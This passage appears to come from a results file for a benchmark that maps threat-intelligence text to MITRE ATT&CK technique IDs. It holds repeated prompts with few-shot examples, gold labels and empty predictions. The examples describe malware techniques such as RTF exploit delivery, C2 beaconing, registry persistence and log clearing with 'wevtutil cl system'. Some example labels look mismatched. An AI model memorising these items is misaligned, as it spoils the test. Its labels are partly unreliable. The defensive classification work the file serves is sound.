malware to run. First, the \"packager trick\" is leveraged in order to embed the initial QuasarRAT dropper (qrat.exe) in the malicious RTF document. Its called the \"packager trick\" because any file embedded in an RTF file using packager will be automatically dropped to the %tmp% folder (c:\\Users\\%username%\\AppData\\Local\\Temp) when the RTF document is opened. Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious \"scriptlet\" file, or .sct file, which is also embedded in the malicious RTF document. The contents of the malicious scriptlet file (displayed below) clearly show the threat actor executing the initial \"qrat.exe\" dropper from the current user's %tmp% directory\n\t - T1204.002: User Execution - Malicious File\n", + "input": "QakBot has spread through emails with malicious attachments.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kimsuky has used FTP to download additional malware to the target machine.\n\t - T1071.002: Application Layer Protocol - File Transfer Protocols\n- Text: UNC2452 configured at least one instance of Cobalt Strike to use a network pipe over SMB during the 2020 SolarWinds intrusion.\n\t - T1090.001: Proxy - Internal Proxy\n- Text: While the decoy in Figure 2 is displayed, the macro will search the document for the delimiter ###$$$ and write the base64 encoded text that follows this delimiter to the file %APPDATA%\\Base.txt. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. As seen in the above request, the Trojan will generate a URL for its beacon with the following structure: http://<c2 domain>/chk. hex(Environment.UserName/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. The C2 server will respond to the Trojan\u2019s request by echoing the value <hex(Environment.UserName/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http://<c2 domain>/what. hex(Environment.UserName/Environment.MachineName)> After issuing the what command, the Trojan will parse the C2's response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit. Otherwise, the Server will respond with a command followed by a set of parameters, split up by the delimiter <>: [command]<>[parameters for command in hexadecimal format] The available commands are\n\t - T1105: Ingress Tool Transfer\n\t - T1030: Data Transfer Size Limits\n", + "input": "Mythic supports SMB-based peer-to-peer C2 profiles.", + "gold": "- T1071.002: Application Layer Protocol - File Transfer Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Shark can update its configuration to use a different C2 server.\n\t - T1008: Fallback Channels\n- Text: GOLD CABIN uses malicious documents, often contained in password-protected archives, delivered through email to download and execute payloads. The second-stage payloads are most frequently Gozi ISFB (Ursnif) or IcedID (Bokbot), sometimes using intermediary malware like Valak. GOLD CABIN infrastructure relies on artificial appearing and frequently changing URLs created with a domain generation algorithm (DGA). The URLs host a PHP object that returns the malware as a DLL file.ToolsTaegis\u2122 XDR Adversary Software Coverage Tool\n\t - T1568.002: Dynamic Resolution - Domain Generation Algorithms\n- Text: SUGARDUMP using SMTP for C2 communication \u2013 dated to late 2021-early 2022. This variant was downloaded from a known UNC3890 C2 (URL: hxxp://128.199.6[.]246/3-Video-VLC.exe), and is a slightly more advanced version with similar credential harvesting functionality. \n\t - T1041: Exfiltration Over C2 Channel\n", + "input": "Bazar has the ability to use an alternative C2 server if the primary server fails.", + "gold": "- T1008: Fallback Channels", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: After using RTF files, the group started using self-extracting (SFX) archives that use common document icons in an attempt to further mislead their victims. It was briefly documented by Threatbook (in Chinese). When run, these self-extracting RAR files drop and execute DLL files (with a .ocx extension) with the final payload being the previously documented {A96B020F-0000-466F-A96D-A91BBF8EAC96}.dll. This section will describe the technique and what they have altered to achieve their goal\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: The shellcode then creates a string that it uses to create a registry key to automatically run the final payload each time the system starts. It then opens the registry key 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon' and sets the value to the \"Shell\" subkey to the previously created string. Ultimately, the following registry key is created for persistence\n\t - T1547.014: Boot or Logon Autostart Execution - Active Setup\n\t - T1547.004: Boot or Logon Autostart Execution - Winlogon Helper DLL\n- Text: Attor's dispatcher can establish persistence via adding a Registry key with a logon script \"HKEY_CURRENT_USER\\Environment \"UserInitMprLogonScript\" \".\n\t - T1037.001: Boot or Logon Initialization Scripts - Logon Script (Windows)\n", + "input": "StrongPity can use the \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" Registry key for persistence.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Capable of stealing documents sent to the printer queue. Data gathered for victim recon includes the backup list for Apple mobile devices. Steals written CD images. Capable of stealing files previously seen on removable drives once they are available again. Steals Internet Explorer, Netscape Navigator, FireFox and RealNetworks cookies\n\t - T1005: Data from Local System\n- Text: Create a Safe Array and copy the decrypted FoggyWeb backdoor bytes to the array. It then calls the Load() function for the current application domain to load the FoggyWeb DLL into the application domain. After the FoggyWeb DLL is loaded into the current application domain, the loader invokes the following method from the DLL: Microsoft.IdentityServer.WebExtension.WebHost. Create a Safe Array and copy the decrypted FoggyWeb backdoor bytes to the array. It then calls the Load() function for the current application domain to load the FoggyWeb DLL into the application domain. After the FoggyWeb DLL is loaded into the current application domain, the loader invokes the following method from the DLL: Microsoft.IdentityServer.WebExtension.WebHost\n\t - T1129: Shared Modules\n- Text: HermeticWizard has the ability to use `wevtutil cl system` to clear event logs.\n\t - T1070.001: Indicator Removal - Clear Windows Event Logs\n", + "input": "Hydraq creates a backdoor through which remote attackers can read data from files.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: CharmPower can send victim data via FTP with credentials hardcoded in the script.\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n- Text: Figure 15: Structure used to send data to server Figure 16: Structure used to send data to C2 server The structure is converted to Base64 using the CryptBinaryToStringA function\n\t - T1048: Exfiltration Over Alternative Protocol\n- Text: SDBbot has sent collected data from a compromised host to its C2 servers.\n\t - T1041: Exfiltration Over C2 Channel\n", + "input": "APT33 has used FTP to exfiltrate files (separately from the C2 channel).", + "gold": "- T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PsExec is then used to launch PowerShell which uses the win32_service WMI class to retrieve services and the net stop command to stop these services. After Windows Defender is disabled and services have been stopped across the organization, PsExec is used to launch the WastedLocker ransomware itself, which then begins encrypting data and deleting shadow volumes\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n\t - T1489: Service Stop\n\t - T1007: System Service Discovery\n- Text: It creates the folder \"\\ProgramData\\AuditService\\\" and copies the clean file \"lsass.exe\" (taken from \"\\Windows\\System32\\\") into the folder. The tainted \"services.exe\" installs \"\\ProgramData\\AuditService\\lsass.exe\" as an autostart Windows service named \"Audit Service\". When the new \"lsass.exe\" service autostarts, the malicious file \"sspisrv.dll\" sideloads in the same folder. lsass.exe\" will eventually crash because of a failure to load other dependencies\n\t - T1543.003: Create or Modify System Process - Windows Service\n\t - T1569.002: System Services - Service Execution\n- Text: In some instances, we have also seen the RemcosRAT malware family delivered as the final payload. Additionally, the process attempts to lower the overall security of the system by disabling security features in Microsoft Office and Windows Defender\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n", + "input": "SLOTHFULMEDIA has the capability to stop processes and services.", + "gold": "- T1489: Service Stop", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Numbered Panda has a long list of high-profile victims and is known by a number of names including: DYNCALC, IXESHE, JOY RAT, APT-12, etc. Numbered Panda has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments. Numbered Panda has targeted organizations in time-sensitive operations such as the Fukushima Reactor Incident of 2011, likely filling intelligence gaps in the ground cleanup/mitigation operations. One of the most interesting techniques that Numbered Panda likes to use is to dynamically calculate the Command and Control (C2) port by resolving a DNS. The malware will typically use two DNS names for communication: one is used for command and control; the other is used with an algorithm to calculate the port to communicate to. There are several variations of the algorithm used to calculate the C2 port, but one of the most common is to multiply the first two octets of the IP address and add the third octet to that value. This is typically represented as: (A * B) + C \u2013 common values might be 200.2.43.X, which would result in communication on port 443. Numbered Panda will frequently use blogs or WordPress in the c2 infrastructure, which helps to make the network traffic look more legitimate. CrowdStrike has observed Numbered Panda targeting high-tech, defense contractors, media organizations, and western governments\n\t - T1568.003: Dynamic Resolution - DNS Calculation\n- Text: NETEAGLE can use HTTP to download resources that contain an IP address and port number pair to connect to for C2.\n\t - T1568: Dynamic Resolution\n- Text: MiniDuke uses Google Search to identify C2 servers if its primary C2 method via Twitter is not working.\n\t - T1008: Fallback Channels\n", + "input": "APT12 has used multiple variants of DNS Calculation including multiplying the first two octets of an IP address and adding the third octet to that value in order to get a resulting command and control port.", + "gold": "- T1568.003: Dynamic Resolution - DNS Calculation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: spearphished victims via Facebook and Whatsapp.\n\t - T1566.003: Phishing - Spearphishing via Service\n- Text: EXOTIC LILY has created e-mail accounts to spoof targeted organizations.\n\t - T1585.002: Establish Accounts - Email Accounts\n- Text: AADInternals can check for the existence of user email addresses using public Microsoft APIs.\n\t - T1589.002: Gather Victim Identity Information - Email Addresses\n", + "input": "EXOTIC LILY has used the e-mail notification features of legitimate file sharing services for spearphishing.", + "gold": "- T1566.003: Phishing - Spearphishing via Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The value is derived using the IOService to access the IOPlatformUUID property, which is equivalent to the \u201cHardware UUID\u201d listed in the system information application, as seen in the Figure 3 screenshot of our analysis system\n\t - T1082: System Information Discovery\n- Text: Equation has been observed utilizing environmental keying in payload delivery.\n\t - T1480.001: Execution Guardrails - Environmental Keying\n- Text: A file stealer can gather the victim's username to send to a C2 server.\n\t - T1033: System Owner/User Discovery\n", + "input": "NanHaiShu can gather the victim computer name and serial number.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: High resolution screenshots of specified process windows and when recording VoiceIP application audio\n\t - T1123: Audio Capture\n- Text: Remcos can access a system\u2019s webcam and take pictures.\n\t - T1125: Video Capture\n- Text: Stage 1: A Master Boot Record (MBR) locker used to overwrite the operating system's MBR, which effectively prevents the operating system from loading successfully - Stage 2: A disk-wiper used to wipe and destroy files on the target machine\n\t - T1561.002: Disk Wipe - Disk Structure Wipe\n", + "input": "PowerSploit's \"Get-MicrophoneAudio\" Exfiltration module can record system microphone audio.", + "gold": "- T1123: Audio Capture", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lazarus Group has conducted internal spearphishing from within a compromised organization.\n\t - T1534: Internal Spearphishing\n- Text: 1) The group delivers a malicious Office lure document to victims, most likely via a spear-phishing email. 2) These lure documents use titles with government, military, and diplomatic themes, and the file names are written in English or Cyrillic languages. These documents are not very sophisticated, but evidence of infections shows that they\u2019re effective\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: Ruler can be used to automate the abuse of Outlook Rules, Forms, and Home Pages to establish persistence.\n\t - T1137: Office Application Startup\n", + "input": "Gamaredon Group has used an Outlook VBA module on infected systems to send phishing emails with malicious attachments to other employees within the organization.", + "gold": "- T1534: Internal Spearphishing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: It appears to us that one organization had its entire Active Directory dumped out, making up most of the credentials we found in the data dump\n\t - T1003: OS Credential Dumping\n- Text: Russian state-sponsored APT actors have exfiltrated credentials and exported copies of the Active Directory database ntds.dit.\n\t - T1003.003: OS Credential Dumping - NTDS\n- Text: Remsec can dump the SAM database.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n", + "input": "Trojan.Karagany can dump passwords and save them into \"\\ProgramData\\Mail\\MailAg\\pwds.txt\".", + "gold": "- T1003: OS Credential Dumping", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: NanoCore has the capability to edit the Registry.\n\t - T1112: Modify Registry\n- Text: RTM has the ability to remove Registry entries that it created for persistence.\n\t - T1070.009: Indicator Removal - Clear Persistence\n- Text: Misdat has created registry keys for persistence, including `HKCU\\Software\\dnimtsoleht\\StubPath`, `HKCU\\Software\\snimtsOleht\\StubPath`, `HKCU\\Software\\Backtsaleht\\StubPath`, `HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed. Components\\{3bf41072-b2b1-21c8-b5c1-bd56d32fbda7}`, and `HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{3ef41072-a2f1-21c8-c5c1-70c2c3bc7905}`.\n\t - T1547: Boot or Logon Autostart Execution\n", + "input": "PcShare can delete its persistence mechanisms from the registry.", + "gold": "- T1112: Modify Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Upon exploitation, a GH0ST RAT variant is delivered to the victims\u2019 system, which calls out to a previously known APT18 CnC address 223.25.233.248. GH0ST RAT is a backdoor derived from public source code\n\t - T1070.001: Indicator Removal - Clear Windows Event Logs\n\t - T1059: Command and Scripting Interpreter\n- Text: The malware accomplishes this through querying the netsvc group value data located in the svchost group registry key which is HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost\n\t - T1012: Query Registry\n- Text: Sibot will delete an associated registry key if a certain server response is received.\n\t - T1070: Indicator Removal\n", + "input": "SynAck enumerates Registry keys associated with event logs.", + "gold": "- T1012: Query Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This phase will often leverage a specialized tool that automatically collects a wide array of information including credentials, group management policies, and even system logs to better hone further attacks and assure execution of their malware\n\t - T1082: System Information Discovery\n- Text: Keylogger: The keylogger is configured using the command line parameters: NetworkService, Replace, Install, Register and Unregister. It also gathers network information such as the MAC address, IP address, WINS, DHCP server, and gateway\n\t - T1016: System Network Configuration Discovery\n- Text: Trojan.Karagany can gather information about the user on a compromised host.\n\t - T1033: System Owner/User Discovery\n", + "input": "SLOTHFULMEDIA has collected system name, OS version, adapter information, memory usage, and disk information from a victim machine.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The following commands were used to create and add the DefaultUser account to the local Administrators group, and subsequently hide the account from the Windows logon screen\n\t - T1087.001: Account Discovery - Local Account\n\t - T1098: Account Manipulation\n\t - T1136.001: Create Account - Local Account\n\t - T1564.002: Hide Artifacts - Hidden Users\n- Text: Ferocious has the ability to add a Class ID in the current user Registry hive to enable persistence mechanisms.\n\t - T1112: Modify Registry\n- Text: TEMP.Veles has modified and added entries within \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\" to maintain persistence.\n\t - T1546.012: Event Triggered Execution - Image File Execution Options Injection\n", + "input": "SMOKEDHAM has modified the Registry to hide created user accounts from the Windows logon screen.", + "gold": "- T1564.002: Hide Artifacts - Hidden Users", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Sandworm Team has used the Telegram Bot API from Telegram Messenger to send and receive commands to its Python backdoor. Sandworm Team also used legitimate M.E.Doc software update check requests for sending and receiving commands and hosted malicious payloads on putdrive.com.\n\t - T1102.002: Web Service - Bidirectional Communication\n- Text: FIN7 has exfiltrated stolen data to the MEGA file sharing site.\n\t - T1567.002: Exfiltration Over Web Service - Exfiltration to Cloud Storage\n- Text: menuPass has collected data from remote systems by mounting network shares with \"net use\" and using Robocopy to transfer data.\n\t - T1039: Data from Network Shared Drive\n", + "input": "PowerStallion uses Microsoft OneDrive as a C2 server via a network drive mapped with \"net use\".", + "gold": "- T1102.002: Web Service - Bidirectional Communication", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HotCroissant has the ability to download files from the infected host to the command and control (C2) server.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: When a document is found matching one of the extensions in the configuration, uploads it to the C2 server.\n\t - T1020: Automated Exfiltration\n- Text: creates a backdoor through which remote attackers can steal system information.\n\t - T1005: Data from Local System\n\t - T1005: Data from Local System\n", + "input": "WarzoneRAT can send collected victim data to its C2 server.", + "gold": "- T1041: Exfiltration Over C2 Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: T9000 gathers and beacons the username of the logged in account during installation. It will also gather the username of running processes to determine if it is running as SYSTEM.\n\t - T1033: System Owner/User Discovery\n- Text: Kobalos can remove all command history on compromised hosts.\n\t - T1070.003: Indicator Removal - Clear Command History\n- Text: Chimera has used \"net user\" for account discovery.\n\t - T1087.001: Account Discovery - Local Account\n", + "input": "Spark has run the whoami command and has a built-in command to identify the user logged in.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: A string, that contains a PDB-path to debug symbols, suggests one such tool was named CredRaptor by the attackers. This tool collects saved passwords from various browsers such as Google Chrome, Internet Explorer, Mozilla Firefox, and Opera\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: Dridex can perform browser attacks via web injects to steal information such as credentials, certificates, and cookies.\n\t - T1185: Browser Session Hijacking\n- Text: Screen capture and audio recording SpyNote RAT was able to take screen captures and, using the device\u2019s microphone, listen to audio conversations\n\t - T1113: Screen Capture\n\t - T1123: Audio Capture\n", + "input": "Imminent Monitor has a PasswordRecoveryPacket module for recovering browser passwords.", + "gold": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Machete has used free dynamic DNS domains for C2.\n\t - T1568.001: Dynamic Resolution - Fast Flux DNS\n- Text: APT18 uses DNS for C2 communications.\n\t - T1071.004: Application Layer Protocol - DNS\n- Text: NETEAGLE can use HTTP to download resources that contain an IP address and port number pair to connect to for C2.\n\t - T1568: Dynamic Resolution\n", + "input": "Amadey has used fast flux DNS for its C2.", + "gold": "- T1568.001: Dynamic Resolution - Fast Flux DNS", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In August 2019, FireEye released the \u201cDouble Dragon\u201d report on our newest graduated threat group, APT41. A China-nexus dual espionage and financially-focused group, APT41 targets industries such as gaming, healthcare, high-tech, higher education, telecommunications, and travel services. APT41 is known to adapt quickly to changes and detections within victim environments, often recompiling malware within hours of incident responder activity. In multiple situations, we also identified APT41 utilizing recently-disclosed vulnerabilities, often weaponzing and exploiting within a matter of days.\n\t - T1595.002: Active Scanning - Vulnerability Scanning\n\t - T1046: Network Service Discovery\n- Text: Analysis of the threat actor\u2019s indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) indicates a correlation with the group known by the names, Pioneer Kitten and UNC757. This threat actor has been observed exploiting several publicly known Common Vulnerabilities and Exposures (CVEs) dealing with Pulse Secure virtual private network (VPN), Citrix NetScaler, and F5 vulnerabilities. This threat actor used these vulnerabilities to gain initial access to targeted networks and then maintained access within the successfully exploited networks for several months using multiple means of persistence\n\t - T1190: Exploit Public-Facing Application\n- Text: has a built-in module for port scanning.\n\t - T1046: Network Service Discovery\n", + "input": "Dragonfly has scanned targeted systems for vulnerable Citrix and Microsoft Exchange services.", + "gold": "- T1595.002: Active Scanning - Vulnerability Scanning", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: uses WMIC to identify anti-virus products installed on the victim\u2019s machine and to obtain firewall details.\n\t - T1047: Windows Management Instrumentation\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: IceApple's Credential Dumper module can dump LSA secrets from registry keys, including: `HKLM\\SECURITY\\Policy\\PolEKList\\default`, `HKLM\\SECURITY\\Policy\\Secrets\\*\\CurrVal`, and `HKLM\\SECURITY\\Policy\\Secrets\\*\\OldVal`.\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n- Text: Fgdump can dump Windows password hashes.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n", + "input": "menuPass has used a modified version of pentesting script wmiexec.vbs, which logs into a remote machine using WMI.", + "gold": 